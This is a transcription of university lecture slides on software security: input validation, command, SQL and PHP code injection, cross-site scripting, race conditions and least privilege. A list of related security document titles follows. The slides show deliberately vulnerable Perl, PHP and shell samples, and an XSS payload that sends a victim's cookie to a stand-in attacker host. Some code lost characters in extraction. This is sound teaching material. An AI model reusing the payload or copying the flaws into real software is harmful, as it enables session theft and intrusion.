CS 356 Lecture 23 and 24 Software Security. Spring 2013
|
|
|
- Loraine Shields
- 9 years ago
- Views:
Transcription
1 CS 356 Lecture 23 and 24 Software Security Spring 2013
2 Review Chapter 1: Basic Concepts and Terminology Chapter 2: Basic Cryptographic Tools Chapter 3 User Authentication Chapter 4 Access Control Lists Chapter 5 Database Security (skipped) Chapter 6 Malicious Software Networking Basics (not in book) Chapter 7 Denial of Service Chapter 8 Intrusion Detection Chapter 9 Firewalls and Intrusion Prevention Chapter 10 Buffer Overflow Chapter 11 Software Security
3 Chapter 11 Software Security
4 Software Security Issues many vulnerabilities result from poor programming practices consequence from insufficient checking and validation of data and error codes awareness of these issues is a critical initial step in writing more secure program code software error categories: insecure interaction between components risky resource management porous defenses
5 CWE/SANS Top 25 Most Dangerous Software Errors Software Error Category: Insecure Interaction Between Components Failure to Preserve Web Page Structure ('Cross-site Scripting') Failure to Preserve SQL Query Structure (aka 'SQL Injection') Cross-Site Request Forgery (CSRF) Unrestricted Upload of File with Dangerous Type Failure to Preserve OS Command Structure (aka 'OS Command Injection') Information Exposure Through an Error Message URL Redirection to Untrusted Site ('Open Redirect') Race Condition Software Error Category: Risky Resource Management Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion') Buffer Access with Incorrect Length Value Improper Check for Unusual or Exceptional Conditions Improper Validation of Array Index Integer Overflow or Wraparound Incorrect Calculation of Buffer Size Download of Code Without Integrity Check Allocation of Resources Without Limits or Throttling Software Error Category: Porous Defenses Improper Access Control (Authorization) Reliance on Untrusted Inputs in a Security Decision Missing Encryption of Sensitive Data Use of Hard-coded Credentials Missing Authentication for Critical Function Incorrect Permission Assignment for Critical Resource Use of a Broken or Risky Cryptographic Algorithm
6 Software Security, Quality and Reliability software quality and reliability: concerned with the accidental failure of program as a result of some theoretically random, unanticipated input, system interaction, or use of incorrect code improve using structured design and testing to identify and eliminate as many bugs as possible from a program concern is not how many bugs, but how often they are triggered software security: attacker chooses probability distribution, specifically targeting bugs that result in a failure that can be exploited by the attacker triggered by inputs that differ dramatically from what is usually expected unlikely to be identified by common testing approaches
7 Defensive Programming a form of defensive design to ensure continued function of software despite unforeseen usage requires attention to all aspects of program execution, environment, and type of data it processes also called secure programming assume nothing, check all potential errors programmer never assumes a particular function call or library will work as advertised so handles it in the code
8 Computer System Abstract Program Model GUI Display Keyboard & Mouse Program Other Programs executing algorithm, processing input data, generating output DBMS Network Link File System Operating System Database Machine Hardware Figure 12.1 Abstract View of Program Figure 11.1
9 Defensive Programming programmers often make assumptions about the type of inputs a program will receive and the environment it executes in assumptions need to be validated by the program and all potential failures handled gracefully and safely conflicts with business pressures to keep development times as short as possible to maximize market advantage requires a changed mindset to traditional programming practices programmers have to understand how failures can occur and the steps needed to reduce the chance of them occurring in their programs
10 Security by Design security and reliability are common design goals in most engineering disciplines software development not as mature much higher failure levels tolerated despite having a number of software development and quality standards main focus is general development lifecycle increasingly identify security as a key goal
11 Handling Program Input incorrect handling is a very common failing input is any source of data from outside and whose value is not explicitly known by the programmer when the code was written must identify all data sources explicitly validate assumptions on size and type of values before use
12 Input Size & Buffer Overflow programmers often make assumptions about the maximum expected size of input allocated buffer size is not confirmed resulting in buffer overflow testing may not identify vulnerability test inputs are unlikely to include large enough inputs to trigger the overflow safe coding treats all input as dangerous
13 Interpretation of Program Input program input may be binary or text binary interpretation depends on encoding and is usually application specific there is an increasing variety of character sets being used care is needed to identify just which set is being used and what characters are being read failure to validate may result in an exploitable vulnerability
14 Injection Attacks flaws relating to invalid handling of input data, specifically when program input data can accidentally or deliberately influence the flow of execution of the program most often occur in scripting languages encourage reuse of other programs and system utilities where possible to save coding effort often used as Web CGI scripts
15 Unsafe Perl Script 1 #!/usr/bin/perl 2 # finger.cgi - finger CGI script using Perl5 CGI module 3 4 use CGI; 5 use CGI::Carp qw(fatalstobrowser); 6 $q = new CGI; # create query object 7 8 # display HTML header 9 print $q->header, 10 $q->start_html('finger User'), 11 $q->h1('finger User'); 12 print "<pre>"; # get name of user and display their finger details 15 $user = $q->param("user"); 16 print `/usr/bin/finger -sh $user`; # display HTML footer 19 print "</pre>"; 20 print $q->end_html; <html><head><title>finger User</title></head><body> <h1>finger User</h1> <form method=post action="finger.cgi"> <b>username to finger</b>: <input type=text name=user value=""> <p><input type=submit value="finger User"> </form></body></html> (b) Finger form Figure 11.2 A Web CGI Injection Attack (a) Unsafe Perl finger CGI script
16 Expected and Subverted Finger CGI Responses Finger User Login Name TTY Idle Login Time Where lpb Lawrie Brown p0 Sat 15:24 ppp41.grapevine Finger User attack success -rwxr-xr-x 1 lpb staff 537 Oct 21 16:19 finger.cgi -rw-r--r-- 1 lpb staff 251 Oct 21 16:14 finger.html (c) Expected and subverted finger CGI responses
17 Safety Extension to Perl Finger CGI Script 14 # get name of user and display their finger details 15 $user = $q->param("user"); 16 die "The specified user contains illegal characters!" 17 unless ($user =~ /^\w+$/); 18 print `/usr/bin/finger -sh $user`; (d) Safety extension to Perl finger CGI script adds a test that ensures user input contains just alphanumeric characters if it doesn t the script terminates with an error message specifying the supplied input contained illegal characters
18 SQL Injection Attack $name = $_REQUEST['name']; $query = SELECT * FROM suppliers WHERE name = '". $name. "';" $result = mysql_query($query); (a) Vulnerable PHP code $name = $_REQUEST['name']; $query = SELECT * FROM suppliers WHERE name = '"....mysql_real_escape_string($name). "';" $result = mysql_query($query); user supplied input is used to construct a SQL request to retrieve information from a database vulnerability is similar to command injection difference is that SQL metacharacters are used rather than shell metacharacters (b) Safer PHP code Figure 11.3 SQL Injection Example to prevent this type of attack the input must be validated before use
19 Code Injection Attack input includes code that is then executed by the attacked system PHP remote code injection vulnerability PHP file inclusion vulnerability PHP CGI scripts are vulnerable and are being actively exploited defenses: block assignment of form field values to global variables only use constant values in include/require commands <?php include $path. 'functions.php'; include $path. 'data/prefs.php'; (a) Vulnerable PHP code GET /calendar/embed/day.php?path= (b) HTTP exploit request Figure 11.4 PHP Code Injection Example
20 Cross Site Scripting (XSS) Attacks attacks where input provided by one user is subsequently output to another user commonly seen in scripted Web applications vulnerability involves the inclusion of script code in the HTML content script code may need to access data associated with other pages browsers impose security checks and restrict data access to pages originating from the same site exploit assumption that all content from one site is equally trusted and hence is permitted to interact with other content from the site XSS reflection vulnerability attacker includes the malicious script content in data supplied to a site
21 XSS Example Figure 11.5 XSS Example Thanks for this information, its great! <script>document.location=' document.cookie</script> (a) Plain XSS example Thanks for this information, its great! <script> document.locatio n='http: //hacker.web.sit e/cookie.cgi?'+d ocument. cookie</ script> (b) Encoded XSS example user s cookie is supplied to the attacker who could then use it to impersonate the user on the original site to prevent this attack any user supplied input should be examined and any dangerous code removed or escaped to block its execution
22 Validating Input Syntax it is necessary to ensure that data conform with any assumptions made about the data before subsequent use input data should be compared against what is wanted alternative is to compare the input data with known dangerous values by only accepting known safe data the program is more likely to remain secure
23 Alternate Encodings may have multiple means of encoding text growing requirement to support users around the globe and to interact with them using their own languages Unicode used for internationalization uses 16-bit value for characters UTF-8 encodes as 1-4 byte sequences many Unicode decoders accept any valid equivalent sequence canonicalization transforming input data into a single, standard, minimal representation once this is done the input data can be compared with a single representation of acceptable input values
24 Validating Numeric Input additional concern when input data represents numeric values internally stored in fixed sized value 8, 16, 32, 64-bit integers floating point numbers depend on the processor used values may be signed or unsigned must correctly interpret text form and process consistently have issues comparing signed to unsigned could be used to thwart buffer overflow check
25 Input Fuzzing developed by Professor Barton Miller at the University of Wisconsin Madison in 1989 software testing technique that uses randomly generated data as inputs to a program range of inputs is very large intent is to determine if the program or function correctly handles abnormal inputs simple, free of assumptions, cheap assists with reliability as well as security can also use templates to generate classes of known problem inputs disadvantage is that bugs triggered by other forms of input would be missed combination of approaches is needed for reasonably comprehensive coverage of the inputs
26 Writing Safe Program Code second component is processing of data by some algorithm to solve required problem high-level languages are typically compiled and linked into machine code which is then directly executed by the target processor security issues: correct algorithm implementation correct machine instructions for algorithm valid manipulation of data
27 Correct Algorithm Implementation issue of good program development technique initial sequence numbers used by many TCP/IP implementations are too predictable another variant is when the programmers deliberately include additional code in a program to help test and debug it algorithm may not correctly handle all problem variants consequence of deficiency is a bug in the resulting program that could be exploited combination of the sequence number as an identifier and authenticator of packets and the failure to make them sufficiently unpredictable enables the attack to occur often code remains in production release of a program and could inappropriately release information may permit a user to bypass security checks and perform actions they would not otherwise be allowed to perform this vulnerability was exploited by the Morris Internet Worm
28 Ensuring Machine Language Corresponds to Algorithm issue is ignored by most programmers assumption is that the compiler or interpreter generates or executes code that validly implements the language statements requires comparing machine code with original source slow and difficult development of computer systems with very high assurance level is the one area where this level of checking is required specifically Common Criteria assurance level of EAL 7
29 Correct Data Interpretation data stored as bits/bytes in computer grouped as words or longwords accessed and manipulated in memory or copied into processor registers before being used interpretation depends on machine instruction executed different languages provide different capabilities for restricting and validating interpretation of data in variables strongly typed languages are more limited, safer other languages allow more liberal interpretation of data and permit program code to explicitly change their interpretation
30 Correct Use of Memory issue of dynamic memory allocation used to manipulate unknown amounts of data allocated when needed, released when done memory leak steady reduction in memory available on the heap to the point where it is completely exhausted many older languages have no explicit support for dynamic memory allocation use standard library routines to allocate and release memory modern languages handle automatically
31 Race Conditions without synchronization of accesses it is possible that values may be corrupted or changes lost due to overlapping access, use, and replacement of shared values arise when writing concurrent code whose solution requires the correct selection and use of appropriate synchronization primitives deadlock processes or threads wait on a resource held by the other one or more programs has to be terminated
32 Operating System Interaction programs execute on systems under the control of an operating system mediates and shares access to resources constructs execution environment includes environment variables and arguments systems have a concept of multiple users resources are owned by a user and have permissions granting access with various rights to different categories of users programs need access to various resources, however excessive levels of access are dangerous concerns when multiple programs access shared resources such as a common file
33 Environment Variables collection of string values inherited by each process from its parent can affect the way a running process behaves included in memory when it is constructed can be modified by the program process at any time modifications will be passed to its children another source of untrusted program input most common use is by a local user attempting to gain increased privileges goal is to subvert a program that grants superuser or administrator privileges
34 Vulnerable Shell Script #!/bin/bash user=`echo $1 sed grep $user /var/local/accounts/ipaddrs (a) Example vulnerable privileged shell script #!/bin/bash PATH= /sbin:/bin:/usr/sbin:/usr/bin export PATH user=`echo $1 sed grep $user /var/local/accounts/ipaddrs (b) Still vulnerable privileged shell script Figure 11.6 Vulnerable Shell Scripts
35 Vulnerable Compiled Programs programs can be vulnerable to PATH variable manipulation must reset to safe values if dynamically linked may be vulnerable to manipulation of LD_LIBRARY_PATH used to locate suitable dynamic library must either statically link privileged programs or prevent use of this variable
36 Use of Least Privilege privilege escalation exploit of flaws may give attacker greater privileges least privilege run programs with least privilege needed to complete their function determine appropriate user and group privileges required decide whether to grant extra user or just group privileges ensure that privileged program can modify only those files and directories necessary
37 Root/Administrator Privileges programs with root / administrator privileges are a major target of attackers they provide highest levels of system access and control are needed to manage access to protected system resources often privilege is only needed at start can then run as normal user good design partitions complex programs in smaller modules with needed privileges provides a greater degree of isolation between the components reduces the consequences of a security breach in one component easier to test and verify
38 System Calls and Standard Library Functions programs use system calls and standard library functions for common operations programmers make assumptions about their operation if incorrect behavior is not what is expected may be a result of system optimizing access to shared resources results in requests for services being buffered, resequenced, or otherwise modified to optimize system use optimizations can conflict with program goals
39 Secure File Shredder patterns = [ , , , , , , ] open file for writing for each pattern seek to start of file overwrite file contents with pattern close file remove file (a) Initial secure file shredding program algorithm patterns = [ , , , , , , ] open file for update for each pattern seek to start of file overwrite file contents with pattern flush application write buffers sync file system write buffers with device close file remove file (b) Better secure file shredding program algorithm Figure 11.7 Example Global Data Overflow Attack
40 Preventing Race Conditions programs may need to access a common system resource need suitable synchronization mechanisms most common technique is to acquire a lock on the shared file lockfile process must create and own the lockfile in order to gain access to the shared resource concerns if a program chooses to ignore the existence of the lockfile and access the shared resource the system will not prevent this all programs using this form of synchronization must cooperate implementation
41 Perl File Locking Example #!/usr/bin/perl # $EXCL_LOCK = 2; $UNLOCK = 8; $FILENAME = forminfo.dat ; # open data file and acquire exclusive access lock open (FILE, ">> $FILENAME") die "Failed to open $FILENAME \n"; flock FILE, $EXCL_LOCK; use exclusive access to the forminfo file to save details # unlock and close file flock FILE, $UNLOCK; close(file); Figure 11.8 Perl File Locking Example
42 Safe Temporary Files many programs use temporary files often in common, shared system area must be unique, not accessed by others commonly create name using process ID unique, but predictable attacker might guess and attempt to create own file between program checking and creating secure temporary file creation and use requires the use of random names
43 Temporary File Creation Example char *filename; int fd; do { filename = tempnam (NULL, "foo"); fd = open (filename, O_CREAT O_EXCL O_TRUNC O_RDWR, 0600); free (filename); } while (fd == 1); Figure 11.9 C Temporary File Creation Example
44 Other Program Interaction programs may use functionality and services of other programs security vulnerabilities can result unless care is taken with this interaction such issues are of particular concern when the program being used did not adequately identify all the security concerns that might arise occurs with the current trend of providing Web interfaces to programs burden falls on the newer programs to identify and manage any security issues that may arise issue of data confidentiality / integrity detection and handling of exceptions and errors generated by interaction is also important from a security perspective
45 Handling Program Output final component is program output may be stored for future use, sent over net, displayed may be binary or text important from a program security perspective that the output conform to the expected form and interpretation programs must identify what is permissible output content and filter any possibly untrusted data to ensure that only valid output is displayed character set should be specified
46 Summary software security issues defensive/secure programming handling program input key concern for input: size /interpretation injection attack command /SQL /code cross-site scripting attacks XSS reflection validating input syntax input fuzzing handling program output writing safe program code correct algorithm implementation ensuring machine language corresponds to algorithm correct interpretation of data values correct use of memory preventing race conditions interacting with the operating system and other programs environment variables least privileges safe temporary file use preventing race conditions
CIS 433/533 - Computer and Network Security. Web Vulnerabilities, Wrapup
CIS 433/533 - Computer and Network Security Web Vulnerabilities, Wrapup Professor Kevin Butler Winter 2011 Computer and Information Science Injection Attacks flaws relating to invalid input handling which
ACS-3921/4921-050 Computer Security And Privacy Lecture Note 8 October 28 th 2015 Chapter 9 Firewalls and Intrusion Prevention Systems
ACS-3921/4921-050 Computer Security And Privacy Lecture Note 8 October 28 th 2015 Chapter 9 Firewalls and Intrusion Prevention Systems ACS-3921/4921-050 Slides Used In The Course A note on the use of these
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda 1. Introductions for new members (5 minutes) 2. Name of group 3. Current
Development. Resilient Software. Secure and. Mark S. Merkow Lakshmikanth Raghavan. CRC Press. Taylor& Francis Croup. Taylor St Francis Group,
Secure and Resilient Software Development Mark S. Merkow Lakshmikanth Raghavan CRC Press Taylor& Francis Croup Boca Raton London New York CRC Press is an imprint of the Taylor St Francis Group, an Informs
FINAL DoIT 11.03.2015 - v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES
Purpose: The Department of Information Technology (DoIT) is committed to developing secure applications. DoIT s System Development Methodology (SDM) and Application Development requirements ensure that
Software security. Buffer overflow attacks SQL injections. Lecture 11 EIT060 Computer Security
Software security Buffer overflow attacks SQL injections Lecture 11 EIT060 Computer Security Buffer overflow attacks Buffer overrun is another common term Definition A condition at an interface under which
Columbia University Web Security Standards and Practices. Objective and Scope
Columbia University Web Security Standards and Practices Objective and Scope Effective Date: January 2011 This Web Security Standards and Practices document establishes a baseline of security related requirements
elearning for Secure Application Development
elearning for Secure Application Development Curriculum Application Security Awareness Series 1-2 Secure Software Development Series 2-8 Secure Architectures and Threat Modeling Series 9 Application Security
Last update: February 23, 2004
Last update: February 23, 2004 Web Security Glossary The Web Security Glossary is an alphabetical index of terms and terminology relating to web application security. The purpose of the Glossary is to
Magento Security and Vulnerabilities. Roman Stepanov
Magento Security and Vulnerabilities Roman Stepanov http://ice.eltrino.com/ Table of contents Introduction Open Web Application Security Project OWASP TOP 10 List Common issues in Magento A1 Injection
FINAL DoIT 04.01.2013- v.8 APPLICATION SECURITY PROCEDURE
Purpose: This procedure identifies what is required to ensure the development of a secure application. Procedure: The five basic areas covered by this document include: Standards for Privacy and Security
CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities
CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities Thomas Moyer Spring 2010 1 Web Applications What has changed with web applications? Traditional applications
Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011 Agenda Evolving Threats Operating System Application User Generated Content JPL s Application Security Program Securing
Top 10 Web Application Security Vulnerabilities - with focus on PHP
Top 10 Web Application Security Vulnerabilities - with focus on PHP Louise Berthilson Alberto Escudero Pascual 1 Resources The Top 10 Project by OWASP www.owasp.org/index.php/owasp_top_ten_project
Criteria for web application security check. Version 2015.1
Criteria for web application security check Version 2015.1 i Content Introduction... iii ISC- P- 001 ISC- P- 001.1 ISC- P- 001.2 ISC- P- 001.3 ISC- P- 001.4 ISC- P- 001.5 ISC- P- 001.6 ISC- P- 001.7 ISC-
More Repeatable Vulnerability Assessment An introduction
Försvarets Materielverk/CSEC 2008 Document ID CB-039 Issue 0.4 More Repeatable Vulnerability Assessment An introduction Helén Svensson 1 Section Agenda Background Introduction to the following aspects
Lecture 11 Web Application Security (part 1)
Lecture 11 Web Application Security (part 1) Computer and Network Security 4th of January 2016 Computer Science and Engineering Department CSE Dep, ACS, UPB Lecture 11, Web Application Security (part 1)
Software Assurance Tools: Web Application Security Scanner Functional Specification Version 1.0
Special Publication 500-269 Software Assurance Tools: Web Application Security Scanner Functional Specification Version 1.0 Paul E. Black Elizabeth Fong Vadim Okun Romain Gaucher Software Diagnostics and
Check list for web developers
Check list for web developers Requirement Yes No Remarks 1. Input Validation 1.1) Have you done input validation for all the user inputs using white listing and/or sanitization? 1.2) Does the input validation
Web Application Hacking (Penetration Testing) 5-day Hands-On Course
Web Application Hacking (Penetration Testing) 5-day Hands-On Course Web Application Hacking (Penetration Testing) 5-day Hands-On Course Course Description Our web sites are under attack on a daily basis
Ruby on Rails Secure Coding Recommendations
Introduction Altius IT s list of Ruby on Rails Secure Coding Recommendations is based upon security best practices. This list may not be complete and Altius IT recommends this list be augmented with additional
Web Application Report
Web Application Report This report includes important security information about your Web Application. Security Report This report was created by IBM Rational AppScan 8.5.0.1 11/14/2012 8:52:13 AM 11/14/2012
What is Web Security? Motivation
[email protected] http://www.brucker.ch/ Information Security ETH Zürich Zürich, Switzerland Information Security Fundamentals March 23, 2004 The End Users View The Server Providers View What is Web
Intrusion detection for web applications
Intrusion detection for web applications Intrusion detection for web applications Łukasz Pilorz Application Security Team, Allegro.pl Reasons for using IDS solutions known weaknesses and vulnerabilities
Application Security Testing. Erez Metula (CISSP), Founder Application Security Expert [email protected]
Application Security Testing Erez Metula (CISSP), Founder Application Security Expert [email protected] Agenda The most common security vulnerabilities you should test for Understanding the problems
WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats
WHITE PAPER FortiWeb and the OWASP Top 10 PAGE 2 Introduction The Open Web Application Security project (OWASP) Top Ten provides a powerful awareness document for web application security. The OWASP Top
CMSC 421, Operating Systems. Fall 2008. Security. URL: http://www.csee.umbc.edu/~kalpakis/courses/421. Dr. Kalpakis
CMSC 421, Operating Systems. Fall 2008 Security Dr. Kalpakis URL: http://www.csee.umbc.edu/~kalpakis/courses/421 Outline The Security Problem Authentication Program Threats System Threats Securing Systems
Detecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008
Detecting Web Application Vulnerabilities Using Open Source Means OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008 Kostas Papapanagiotou Committee Member OWASP Greek Chapter [email protected]
Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh
Web applications Web security: web basics Myrto Arapinis School of Informatics University of Edinburgh HTTP March 19, 2015 Client Server Database (HTML, JavaScript) (PHP) (SQL) 1 / 24 2 / 24 URLs HTTP
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security Presented 2009-05-29 by David Strauss Thinking Securely Security is a process, not
WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY
WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY www.alliancetechpartners.com WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY More than 70% of all websites have vulnerabilities
Chapter 1 Web Application (In)security 1
Introduction xxiii Chapter 1 Web Application (In)security 1 The Evolution of Web Applications 2 Common Web Application Functions 4 Benefits of Web Applications 5 Web Application Security 6 "This Site Is
Columbia University Web Application Security Standards and Practices. Objective and Scope
Columbia University Web Application Security Standards and Practices Objective and Scope Effective Date: January 2011 This Web Application Security Standards and Practices document establishes a baseline
Where every interaction matters.
Where every interaction matters. Peer 1 Vigilant Web Application Firewall Powered by Alert Logic The Open Web Application Security Project (OWASP) Top Ten Web Security Risks and Countermeasures White Paper
Web Application Security Guidelines for Hosting Dynamic Websites on NIC Servers
Web Application Security Guidelines for Hosting Dynamic Websites on NIC Servers The Website can be developed under Windows or Linux Platform. Windows Development should be use: ASP, ASP.NET 1.1/ 2.0, and
DISCOVERY OF WEB-APPLICATION VULNERABILITIES USING FUZZING TECHNIQUES
DISCOVERY OF WEB-APPLICATION VULNERABILITIES USING FUZZING TECHNIQUES By Michael Crouse Dr. Errin W. Fulp, Ph.D., Advisor Abstract The increasingly high volume of users on the web and their use of web
Sitefinity Security and Best Practices
Sitefinity Security and Best Practices Table of Contents Overview The Ten Most Critical Web Application Security Risks Injection Cross-Site-Scripting (XSS) Broken Authentication and Session Management
Web application security
Web application security Sebastian Lopienski CERN Computer Security Team openlab and summer lectures 2010 (non-web question) Is this OK? int set_non_root_uid(int uid) { // making sure that uid is not 0
Webapps Vulnerability Report
Tuesday, May 1, 2012 Webapps Vulnerability Report Introduction This report provides detailed information of every vulnerability that was found and successfully exploited by CORE Impact Professional during
Certified Secure Web Application Security Test Checklist
www.certifiedsecure.com [email protected] Tel.: +31 (0)70 310 13 40 Loire 128-A 2491 AJ The Hague The Netherlands Certified Secure Checklist About Certified Secure exists to encourage and fulfill
Thick Client Application Security
Thick Client Application Security Arindam Mandal ([email protected]) (http://www.paladion.net) January 2005 This paper discusses the critical vulnerabilities and corresponding risks in a two
Points of View. CxO s point of view. Developer s point of view. Attacker s point of view
Web App Security 2 CxO s point of view Points of View Measurable security SCAP (Security Content Automation Protocol) Developer s point of view Secure coding/software security CWE (Common Weakness Enumeration)
Web Application Guidelines
Web Application Guidelines Web applications have become one of the most important topics in the security field. This is for several reasons: It can be simple for anyone to create working code without security
3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management
What is an? s Ten Most Critical Web Application Security Vulnerabilities Anthony LAI, CISSP, CISA Chapter Leader (Hong Kong) [email protected] Open Web Application Security Project http://www.owasp.org
05.0 Application Development
Number 5.0 Policy Owner Information Security and Technology Policy Application Development Effective 01/01/2014 Last Revision 12/30/2013 Department of Innovation and Technology 5. Application Development
Threat Modeling/ Security Testing. Tarun Banga, Adobe 1. Agenda
Threat Modeling/ Security Testing Presented by: Tarun Banga Sr. Manager Quality Engineering, Adobe Quality Leader (India) Adobe Systems India Pvt. Ltd. Agenda Security Principles Why Security Testing Security
ASP.NET MVC Secure Coding 4-Day hands on Course. Course Syllabus
ASP.NET MVC Secure Coding 4-Day hands on Course Course Syllabus Course description ASP.NET MVC Secure Coding 4-Day hands on Course Secure programming is the best defense against hackers. This multilayered
Attack Vector Detail Report Atlassian
Attack Vector Detail Report Atlassian Report As Of Tuesday, March 24, 2015 Prepared By Report Description Notes [email protected] The Attack Vector Details report provides details of vulnerability
Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability
Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability WWW Based upon HTTP and HTML Runs in TCP s application layer Runs on top of the Internet Used to exchange
1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications
1. Introduction 2. Web Application 3. Components 4. Common Vulnerabilities 5. Improving security in Web applications 2 What does World Wide Web security mean? Webmasters=> confidence that their site won
Adobe Systems Incorporated
Adobe Connect 9.2 Page 1 of 8 Adobe Systems Incorporated Adobe Connect 9.2 Hosted Solution June 20 th 2014 Adobe Connect 9.2 Page 2 of 8 Table of Contents Engagement Overview... 3 About Connect 9.2...
White Paper BMC Remedy Action Request System Security
White Paper BMC Remedy Action Request System Security June 2008 www.bmc.com Contacting BMC Software You can access the BMC Software website at http://www.bmc.com. From this website, you can obtain information
OWASP and OWASP Top 10 (2007 Update) OWASP. The OWASP Foundation. Dave Wichers. The OWASP Foundation. OWASP Conferences Chair dave.wichers@owasp.
and Top 10 (2007 Update) Dave Wichers The Foundation Conferences Chair [email protected] COO, Aspect Security [email protected] Copyright 2007 - The Foundation This work is available
Web Application Security
E-SPIN PROFESSIONAL BOOK Vulnerability Management Web Application Security ALL THE PRACTICAL KNOW HOW AND HOW TO RELATED TO THE SUBJECT MATTERS. COMBATING THE WEB VULNERABILITY THREAT Editor s Summary
Web Application Vulnerability Testing with Nessus
The OWASP Foundation http://www.owasp.org Web Application Vulnerability Testing with Nessus Rïk A. Jones, CISSP [email protected] Rïk A. Jones Web developer since 1995 (16+ years) Involved with information
Project 2: Web Security Pitfalls
EECS 388 September 19, 2014 Intro to Computer Security Project 2: Web Security Pitfalls Project 2: Web Security Pitfalls This project is due on Thursday, October 9 at 6 p.m. and counts for 8% of your course
Essential IT Security Testing
Essential IT Security Testing Application Security Testing for System Testers By Andrew Muller Director of Ionize Who is this guy? IT Security consultant to the stars Member of OWASP Member of IT-012-04
Promoting Application Security within Federal Government. AppSec DC November 13, 2009. The OWASP Foundation http://www.owasp.org
Promoting Application Security within Federal Government AppSec DC November 13, 2009 Dr. Sarbari Gupta, CISSP, CISA Founder/President Electrosoft [email protected] 703-437-9451 ext 12 The Foundation
Application Security Testing. Generic Test Strategy
Application Security Testing Generic Test Strategy Page 2 of 8 Contents 1 Introduction 3 1.1 Purpose: 3 1.2 Application Security Testing: 3 2 Audience 3 3 Test Strategy guidelines 3 3.1 Authentication
Promoting Application Security within Federal Government. AppSec DC November 13, 2009. The OWASP Foundation http://www.owasp.org
Promoting Application Security within Federal Government AppSec DC November 13, 2009 Dr. Sarbari Gupta, CISSP, CISA Founder/President Electrosoft [email protected] 703-437-9451 ext 12 The Foundation
ArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young
ArcGIS Server Security Threats & Best Practices 2014 David Cordes Michael Young Agenda Introduction Threats Best practice - ArcGIS Server settings - Infrastructure settings - Processes Summary Introduction
Source Code Review Using Static Analysis Tools
Source Code Review Using Static Analysis Tools July-August 05 Author: Stavros Moiras Supervisor(s): Stefan Lüders Aimilios Tsouvelekakis CERN openlab Summer Student Report 05 Abstract Many teams at CERN,
Integrated Network Vulnerability Scanning & Penetration Testing SAINTcorporation.com
SAINT Integrated Network Vulnerability Scanning and Penetration Testing www.saintcorporation.com Introduction While network vulnerability scanning is an important tool in proactive network security, penetration
The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.
This sample report is published with prior consent of our client in view of the fact that the current release of this web application is three major releases ahead in its life cycle. Issues pointed out
A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications. Slides by Connor Schnaith
A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications Slides by Connor Schnaith Cross-Site Request Forgery One-click attack, session riding Recorded since 2001 Fourth out of top 25 most
Homeland Security Red Teaming
Homeland Security Red Teaming Directs intergovernmental coordination Specifies Red Teaming Viewing systems from the perspective of a potential adversary Target hardening Looking for weakness in existing
Hack Proof Your Webapps
Hack Proof Your Webapps About ERM About the speaker Web Application Security Expert Enterprise Risk Management, Inc. Background Web Development and System Administration Florida International University
Template for PFI Final Incident Report for Remote Investigations
Payment Card Industry (PCI) Data Security Standard PFI Final Incident Report for Remote Investigations Template for PFI Final Incident Report for Remote Investigations Version 1.1 February 2015 Document
Payment Card Industry (PCI) Data Security Standard PFI Final Incident Report. Template for PFI Final Incident Report. Version 1.0.
Payment Card Industry (PCI) Data Security Standard PFI Final Incident Report Template for PFI Final Incident Report Version 1.0 August 2014 Document Changes Date Version Description August 2014 1.0 To
Web App Security Audit Services
locuz.com Professional Services Web App Security Audit Services The unsecured world today Today, over 80% of attacks against a company s network come at the Application Layer not the Network or System
The Top Web Application Attacks: Are you vulnerable?
QM07 The Top Web Application Attacks: Are you vulnerable? John Burroughs, CISSP Sr Security Architect, Watchfire Solutions [email protected] Agenda Current State of Web Application Security Understanding
How To Fix A Web Application Security Vulnerability
Proposal of Improving Web Application Security in Context of Latest Hacking Trends RADEK VALA, ROMAN JASEK Department of Informatics and Artificial Intelligence Tomas Bata University in Zlin, Faculty of
D. Best Practices D.1. Assurance The 5 th A
Best Practices I&C School Prof. P. Janson September 2014 D. Best Practices D.1. Assurance The 5 th A 1 of 20 IT systems are insecure for two main reasons: People are fallible and systems are complex and
Web Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure
Vulnerabilities, Weakness and Countermeasures Massimo Cotelli CISSP Secure : Goal of This Talk Security awareness purpose Know the Web Application vulnerabilities Understand the impacts and consequences
Application Intrusion Detection
Application Intrusion Detection Drew Miller Black Hat Consulting Application Intrusion Detection Introduction Mitigating Exposures Monitoring Exposures Response Times Proactive Risk Analysis Summary Introduction
Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet
